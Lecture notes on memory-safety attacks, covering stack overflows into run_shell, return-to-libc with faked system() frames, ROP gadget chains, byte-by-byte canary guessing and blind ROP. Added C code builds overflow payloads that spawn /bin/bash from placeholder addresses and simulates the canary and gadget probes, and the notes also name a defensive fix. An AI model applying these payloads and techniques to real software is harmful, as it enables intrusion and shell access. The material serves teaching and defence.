COMPUTER SYSTEM SECURITY
Lecture notes, pages 13 to 20 of 22.
    void run_shell() {
        system("/bin/bash");
    }

    void process_msg() {
        char buf[128];
        gets(buf);
    }

How can the attacker invoke run_shell, which nothing in the program calls?

The attacker can do a couple of things:
(1) Disassemble the program, or run it in gdb, and find the address of run_shell in the executable.
(2) During the buffer overflow, put that address into the overflowing input at the position of the saved return address, so that when process_msg executes ret, control goes to run_shell instead of back to the caller.

Stack frame of process_msg after the overflow (high addresses at the top; the original diagram mixes %rbp and %esp, it is drawn here for 32-bit x86, which is also the convention the fake calling frame on the next page relies on):

    return address      <- overwritten with the address of run_shell
    saved %ebp          <- overwritten with junk
    buf[127]
    ...
    buf[0]              <- %esp, start of the overflowing input
    char *bash_path = "/bin/bash";

    void run_boring() {
        system("/bin/ls");
    }

    void process_msg() {
        char buf[128];
        gets(buf);
    }

Now there is no run_shell to jump to, but system() is still linked in, and the string "/bin/bash" is in the program's data. How do we invoke system with an argument of our choice?

By faking a calling frame for system: lay out the stack exactly as a real call instruction would have left it. On 32-bit x86 (cdecl), when system starts executing, %esp points at its return address and the first argument is the word above it:

    argument to system          <- %esp + 4: the address of the string we want
    return address for system   <- %esp: where system should return to when it is done
Stack after the overflow, with the fake frame for system in place (high addresses at the top):

    address of "/bin/bash"      <- the argument system() sees
    junk return address         <- where system() returns once the shell exits (a crash there is fine)
    address of system           <- overwrote process_msg's return address
    saved %ebp                  <- junk
    buf[127]
    ...
    buf[0]                      <- %esp

When process_msg executes ret, the address of system is popped into %eip and %esp now points at the junk return address, which is exactly the state system() expects after a real call instruction, so it reads its argument from %esp + 4 and runs "/bin/bash".

What if the string containing the path is not in the program?
Then we supply the string ourselves. The overflowing input starts with "/bin/bash\0" (the diagram shows it as the pieces "/bin", "/pat", "h\0" at the bottom of buf) and the argument word in the fake frame is the address of buf[0]. This requires the stack address of buf to be known, i.e. no ASLR.

    address of "/bin/bash" (= address of buf[0])
    junk return address
    address of system           <- overwrote the return address
    saved %ebp
    buf[127]
    ...
    buf[0]: "/bin/bash\0"       <- %esp

What if we want to call system an arbitrary number of times?

We need to find the address of these two opcodes somewhere in the existing executable code:

    pop %eax    // pop top of stack ----> %eax   (discards the argument word of the previous call)
    ret         // pop top of stack ----> %eip   (continues with the next address on the stack)

The above is called a gadget: a small set of assembly instructions, ending in ret, that the attacker can reuse.

How can we find these gadgets? There are off-the-shelf tools that scan a binary for instruction sequences ending in ret (e.g. ROPgadget or ropper).
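The payloads these diagrams describe, built as bytes by an added example (this code is not from the lecture notes). It assumes a 32-bit x86 process in which process_msg's buf[128] is followed by the saved %ebp and then the return address, and every address (ADDR_RUN_SHELL, ADDR_SYSTEM, ADDR_EXIT, ADDR_BASH_STR, ADDR_POP_RET, ADDR_BUF) is a hypothetical constant standing in for a value the attacker would read out of gdb or objdump. It covers the single return into run_shell, the fake frame for system() with the string either in the binary or inside buf, and the chained form using the pop;ret gadget that the next page draws.

```c
/* Added example, not from the lecture notes: builds overflow payloads for a
 * 32-bit x86 process where process_msg() has char buf[128], then the saved
 * %ebp, then the return address. All addresses are hypothetical constants. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_SIZE    128u                  /* char buf[128] */
#define RET_OFFSET  (BUF_SIZE + 4u)       /* saved %ebp (4 bytes) sits between buf and the return address */

/* Hypothetical addresses (no ASLR, as the notes assume). */
#define ADDR_RUN_SHELL  0x08048560u       /* run_shell() in the binary */
#define ADDR_SYSTEM     0xf7e3a0d0u       /* system() in libc */
#define ADDR_EXIT       0xf7e2d9e0u       /* exit() in libc: clean finish after the last system() */
#define ADDR_BASH_STR   0x0804a010u       /* "/bin/bash" in the binary's data section */
#define ADDR_POP_RET    0x080484a3u       /* "pop %eax ; ret" gadget */
#define ADDR_BUF        0xffffd120u       /* buf[0] on the stack, used when the string is not in the binary */

uint8_t g_payload[512];                   /* scratch buffer for the demonstrations */

/* Little-endian store, as x86 expects. */
static size_t put32(uint8_t *p, uint32_t v)
{
    p[0] = (uint8_t)v;         p[1] = (uint8_t)(v >> 8);
    p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
    return 4;
}

/* Read a word back, to inspect the layout. */
uint32_t get32(const uint8_t *p, size_t off)
{
    return (uint32_t)p[off] | (uint32_t)p[off + 1] << 8 |
           (uint32_t)p[off + 2] << 16 | (uint32_t)p[off + 3] << 24;
}

/* Overwrite only the return address so process_msg returns into run_shell. */
size_t payload_ret_to_run_shell(uint8_t *out, size_t cap)
{
    if (cap < RET_OFFSET + 4) return 0;
    memset(out, 'A', RET_OFFSET);                 /* fills buf and the saved %ebp with junk */
    return RET_OFFSET + put32(out + RET_OFFSET, ADDR_RUN_SHELL);
}

/* Fake a calling frame for system(), n_calls times. Each call is
 * [addr of system][return address][argument]. For all but the last call the
 * "return address" is the pop;ret gadget, which discards the argument word and
 * returns into the next system(); the last call returns into exit(). If str is
 * non-NULL it is placed at buf[0] and the argument points at ADDR_BUF instead
 * of at a string inside the binary. Returns the payload length, 0 on error. */
size_t payload_system_chain(uint8_t *out, size_t cap, unsigned n_calls, const char *str)
{
    size_t need = RET_OFFSET + 12u * n_calls, off;
    uint32_t arg = ADDR_BASH_STR;
    unsigned i;
    if (n_calls == 0 || cap < need) return 0;
    memset(out, 'A', RET_OFFSET);
    if (str != NULL) {
        size_t len = strlen(str) + 1;             /* keep the NUL: system() needs a terminated string */
        if (len > BUF_SIZE) return 0;
        memcpy(out, str, len);
        arg = ADDR_BUF;
    }
    off = RET_OFFSET;
    for (i = 0; i < n_calls; i++) {
        off += put32(out + off, ADDR_SYSTEM);
        off += put32(out + off, i + 1 < n_calls ? ADDR_POP_RET : ADDR_EXIT);
        off += put32(out + off, arg);
    }
    return off;
}

/* gets() stops at the first newline, so a payload containing 0x0a would be cut
 * off before it reaches the return address. NUL bytes are fine for gets(). */
int payload_is_gets_safe(const uint8_t *p, size_t len)
{
    size_t i;
    for (i = 0; i < len; i++)
        if (p[i] == '\n') return 0;
    return 1;
}

int main(void)
{
    size_t n = payload_system_chain(g_payload, sizeof g_payload, 2, NULL), i;
    printf("%zu bytes, gets-safe=%d\n", n, payload_is_gets_safe(g_payload, n));
    for (i = RET_OFFSET; i < n; i += 4)
        printf("  +%3zu: 0x%08x\n", i, get32(g_payload, i));
    return 0;
}
```

The bytes would be fed to the program's stdin; since every address is chosen without a 0x0a byte, payload_is_gets_safe() passes, which is the first thing to check when a payload "stops working" after the addresses change.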
Chained fake frames (high addresses at the top):

    address of "/bin/bash"          <- argument of the second system() call
    address of pop;ret gadget       <- "return address" of the second call (or exit, for the last one)
    address of system               <- second call
    address of "/bin/bash"          <- argument of the first system() call
    address of pop;ret gadget       <- "return address" of the first call
    address of system               <- overwrote process_msg's return address
    saved %ebp
    buf[127]
    ...
    buf[0]

When the first system() returns, it returns into the pop;ret gadget: pop discards the argument word and ret pops the next word, the address of system, into %eip, and the second fake frame is in place. So in this way we can repeat the call an arbitrary number of times.

Now what is interesting is that we are not executing anything on the stack; we only jump around inside code that is already in the process (so a non-executable stack, executable bit set to 0, does not stop this). In essence ROP uses the stack pointer as the instruction pointer: every ret fetches the next "instruction", a gadget address, from the stack.

(On x86-64 the first argument is passed in %rdi rather than on the stack, so the same attack needs a "pop %rdi; ret" gadget in front of each call to system.)

Next: how to defeat stack canaries? Can we guess the canary?

Assumptions:
(1) the server has a buffer overflow vulnerability
(2) the server crashes and restarts when it sees a bad canary
(3) after the restart, the canary and the address layout (ASLR) are not re-randomized

Why does assumption (3) hold? Because a lot of servers use fork to create a new process per connection, and a forked child inherits the parent's address layout and its canary value. Every crashed worker is replaced by another child of the same parent, so the attacker faces the same canary and the same addresses each time.

Now we can iteratively guess the canary, one byte at a time: overflow just the first byte of the canary with a guess. If the worker crashes, the guess was wrong; if the connection survives, the byte was right and we move on to the next one. That is at most 256 tries per byte, so at most 8 * 256 = 2048 probes for a 64-bit canary instead of 2^64.

BROP (blind return oriented programming):

(1) Find a stop gadget: a return address to some place in the code that, if you jump to it, will pause the program but not crash it (e.g. a call to sleep() or an infinite loop). The attacker notices the difference because the connection stays open instead of being dropped.

(2) Find gadgets that pop stack entries. Sequence to find a stack-popping gadget:

    probe addr: address of a potential stack-popping gadget
    stop addr:  address of the stop gadget
    crash addr: address of non-executable memory (0x0)

e.g. the stack is overwritten with

    probe: 0x4....8    (candidate 1: pop rax; ret)    or    0x4....c    (candidate 2: xor rax, rax; ret)
    trap:  0x0         (crash if control ever reaches it)
    stop:  0x5....5    ----> sleep(10)

If the probe is "pop rax; ret", the pop consumes the trap word and ret jumps to the stop gadget, so the program hangs. If the probe is "xor rax, rax; ret", nothing is popped, ret jumps to 0x0 and the program crashes. A hang therefore means "this address pops exactly one word".

(3) Determine which registers the pop gadgets use. We can make use of the pause system call: it takes no arguments and blocks the process, so if the right number ends up in rax when a syscall instruction runs, the program hangs. To find which gadget pops into rax, chain all of the pop gadgets from step (2) on the stack, and in between each of them put the syscall number for pause (34 on x86-64), and then see if we can actually get the program to hang.
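The byte-at-a-time canary guess described above, simulated as an added example (this code is not from the lecture notes). server_child() stands in for one forked worker handling one request, g_parent_canary is a constructed secret that every worker inherits unchanged, and the attacker side only learns whether the worker survived or crashed.

```c
/* Added example, not from the lecture notes: guessing a stack canary one byte
 * at a time against a forking server that never re-randomizes it. The server
 * is a plain function standing in for the network service. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define CANARY_LEN 8

/* Constructed secret canary of the parent process. Every forked child inherits
 * it unchanged (the BROP assumption). The low byte is 0x00 as glibc does it, so
 * str* functions cannot be used to leak it. */
static const uint8_t g_parent_canary[CANARY_LEN] =
    { 0x00, 0x3a, 0x9c, 0x41, 0x7f, 0xe2, 0x15, 0xd8 };

/* One forked child handling one request. The request overflows a buffer that
 * sits right below the canary: bytes 0..len-1 of the canary slot are replaced
 * by attacker data, the rest keep the inherited value. Returns 1 if the child
 * survives (canary intact when the function returns), 0 if it "crashes"
 * (__stack_chk_fail), which the attacker sees as a dropped connection. */
static int server_child(const uint8_t *overflow, size_t len)
{
    uint8_t canary_slot[CANARY_LEN];
    memcpy(canary_slot, g_parent_canary, CANARY_LEN);   /* fork: child inherits the canary */
    if (len > CANARY_LEN) len = CANARY_LEN;
    memcpy(canary_slot, overflow, len);                  /* the overflow */
    return memcmp(canary_slot, g_parent_canary, CANARY_LEN) == 0;
}

/* Attacker side: recover the canary byte by byte, writing only up to the byte
 * under test so the untouched bytes stay correct. At most 256 probes per byte,
 * 2048 in total for 8 bytes. Returns the number of probes used, or -1 if some
 * byte could never be confirmed (which would mean the canary changed). */
long guess_canary(uint8_t *recovered)
{
    long probes = 0;
    size_t pos;
    for (pos = 0; pos < CANARY_LEN; pos++) {
        int found = 0, b;
        for (b = 0; b < 256; b++) {
            recovered[pos] = (uint8_t)b;
            probes++;
            if (server_child(recovered, pos + 1)) { found = 1; break; }   /* survived: byte is right */
        }
        if (!found) return -1;
    }
    return probes;
}

/* Did the attacker recover the real canary? */
int canary_matches(const uint8_t *c)
{
    return memcmp(c, g_parent_canary, CANARY_LEN) == 0;
}

int main(void)
{
    uint8_t c[CANARY_LEN] = { 0 };
    long probes = guess_canary(c);
    printf("canary recovered in %ld probes, match=%d\n", probes, canary_matches(c));
    return 0;
}
```

The probe count is the sum of (byte value + 1) over the eight bytes, far below the 2048 bound. The fix the simulation points at is to have the worker re-execute itself (fork followed by exec) so each child gets a fresh canary and a fresh layout; then a surviving prefix tells the attacker nothing about the next child, and the loop above can no longer confirm any byte.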
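The two BROP probes from steps (1) and (2), the stop-gadget scan and the probe/trap/stop chain, run against a simulated target as an added example (this code is not from the lecture notes). The remote binary is a constructed table (g_text) mapping each address to what executing there does; the attacker side never reads that table and only sees whether a probe hangs or crashes, as in a blind attack. The step (3) register test is not modelled.

```c
/* Added example, not from the lecture notes: simulator for the BROP stop-gadget
 * and pop-gadget probes. The "unknown binary" is a constructed table. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

enum gadget { G_CRASH, G_RET, G_POP1_RET, G_POP2_RET, G_STOP };
enum result { R_CRASH, R_HANG };

#define TEXT_SIZE 16u
#define TRAP      0u      /* 0x0 is unmapped: returning there crashes */

/* Constructed text segment: what executing at each address does. */
static const enum gadget g_text[TEXT_SIZE] = {
    G_CRASH, G_RET, G_CRASH, G_POP1_RET, G_RET, G_CRASH, G_STOP, G_POP2_RET,
    G_CRASH, G_CRASH, G_POP1_RET, G_RET, G_CRASH, G_STOP, G_CRASH, G_RET };

/* Run the victim with its return address and the words above it replaced by
 * chain[]. Each ret takes the next word as the new instruction pointer; a pop
 * gadget first consumes words. Running off the end of the chain returns into
 * whatever junk follows, modelled as a crash. */
static enum result run_chain(const uint32_t *chain, size_t n)
{
    size_t sp = 0;
    uint32_t pc;
    int steps;
    if (n == 0) return R_CRASH;
    pc = chain[sp++];
    for (steps = 0; steps < 64; steps++) {
        if (pc >= TEXT_SIZE) return R_CRASH;        /* unmapped or non-executable */
        switch (g_text[pc]) {
        case G_STOP:     return R_HANG;             /* e.g. sleep(10): no reply, no crash */
        case G_CRASH:    return R_CRASH;
        case G_RET:      break;
        case G_POP1_RET: sp += 1; break;
        case G_POP2_RET: sp += 2; break;
        }
        if (sp >= n) return R_CRASH;
        pc = chain[sp++];
    }
    return R_CRASH;
}

/* Step 1: find a stop gadget. Probe every address with the chain [addr]: only
 * a stop gadget keeps the connection open, everything else returns into junk. */
uint32_t find_stop_gadget(void)
{
    uint32_t addr;
    for (addr = 0; addr < TEXT_SIZE; addr++) {
        uint32_t chain[1] = { addr };
        if (run_chain(chain, 1) == R_HANG) return addr;
    }
    return UINT32_MAX;
}

/* Step 2: find gadgets that pop exactly one word, with [probe, trap, stop, trap, trap, trap]:
 *   pop;ret      pops the trap, returns into stop            -> hang
 *   ret          returns into the trap                       -> crash
 *   pop;pop;ret  eats trap and stop, returns into a trap     -> crash
 * A second stop gadget would also hang, so confirm with [probe, trap, trap, trap]:
 * a real single-pop gadget crashes there, a stop gadget still hangs.
 * Fills out[] with the addresses found and returns how many. */
size_t find_single_pop_gadgets(uint32_t stop, uint32_t *out, size_t cap)
{
    size_t found = 0;
    uint32_t addr;
    for (addr = 0; addr < TEXT_SIZE && found < cap; addr++) {
        uint32_t probe[6]   = { addr, TRAP, stop, TRAP, TRAP, TRAP };
        uint32_t confirm[4] = { addr, TRAP, TRAP, TRAP };
        if (addr == stop) continue;
        if (run_chain(probe, 6) == R_HANG && run_chain(confirm, 4) == R_CRASH)
            out[found++] = addr;
    }
    return found;
}

int main(void)
{
    uint32_t stop = find_stop_gadget(), pops[TEXT_SIZE];
    size_t n = find_single_pop_gadgets(stop, pops, TEXT_SIZE), i;
    printf("stop gadget at %u; single-pop gadgets:", stop);
    for (i = 0; i < n; i++) printf(" %u", pops[i]);
    printf("\n");
    return 0;
}
```

Against a real server each run_chain() call is one connection and one crash-and-restart of a worker, which is why the whole approach depends on assumptions (2) and (3) above: the probes only make sense if the addresses mean the same thing from one worker to the next.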

  • Fall '16
  • Piyush Rai
  • Pointer